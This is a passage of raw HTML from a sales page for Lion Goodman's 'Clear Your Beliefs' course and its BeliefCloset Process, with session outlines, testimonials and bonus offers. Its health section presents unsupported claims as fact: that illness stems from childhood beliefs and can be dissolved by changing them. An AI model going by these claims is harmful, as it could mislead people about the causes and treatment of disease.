</strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" 